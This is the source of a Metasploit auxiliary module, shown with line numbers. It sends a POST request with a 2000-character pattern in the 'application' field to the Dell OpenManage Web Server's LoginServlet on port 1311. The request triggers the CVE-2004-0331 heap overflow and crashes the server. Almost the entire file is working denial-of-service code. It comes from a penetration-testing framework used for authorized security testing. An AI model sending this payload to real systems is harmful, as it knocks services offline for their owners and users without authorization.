Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(update_info(info,
12
      'Name'           => 'Dell OpenManage POST Request Heap Overflow (win32)',
13
      'Description'    => %q{
14
        This module exploits a heap overflow in the Dell OpenManage
15
        Web Server (omws32.exe), versions 3.2-3.7.1. The vulnerability
16
        exists due to a boundary error within the handling of POST requests,
17
        where the application input is set to an overly long file name.
18
        This module will crash the web server, however it is likely exploitable
19
        under certain conditions.
20
      },
21
      'Author'         => [ 'aushack' ],
22
      'License'        => MSF_LICENSE,
23
      'References'     =>
24
        [
25
          [ 'URL', 'http://archives.neohapsis.com/archives/bugtraq/2004-02/0650.html' ],
26
          [ 'BID', '9750' ],
27
          [ 'OSVDB', '4077' ],
28
          [ 'CVE', '2004-0331' ],
29
        ],
30
      'DisclosureDate' => '2004-02-26'))
31

32
    register_options(
33
      [
34
        Opt::RPORT(1311),
35
        OptBool.new('SSL', [true, 'Use SSL', true]),
36
      ],
37
    self.class)
38
  end
39

40
  def run
41
    connect
42

43
    foo = "user=user&password=password&domain=domain&application=" + Rex::Text.pattern_create(2000)
44

45
    sploit = "POST /servlet/LoginServlet?flag=true HTTP/1.0\r\n"
46
    sploit << "Content-Length: #{foo.length}\r\n\r\n"
47
    sploit << foo
48

49
    sock.put(sploit +"\r\n\r\n")
50

51
    disconnect
52
  end
53
end
54

55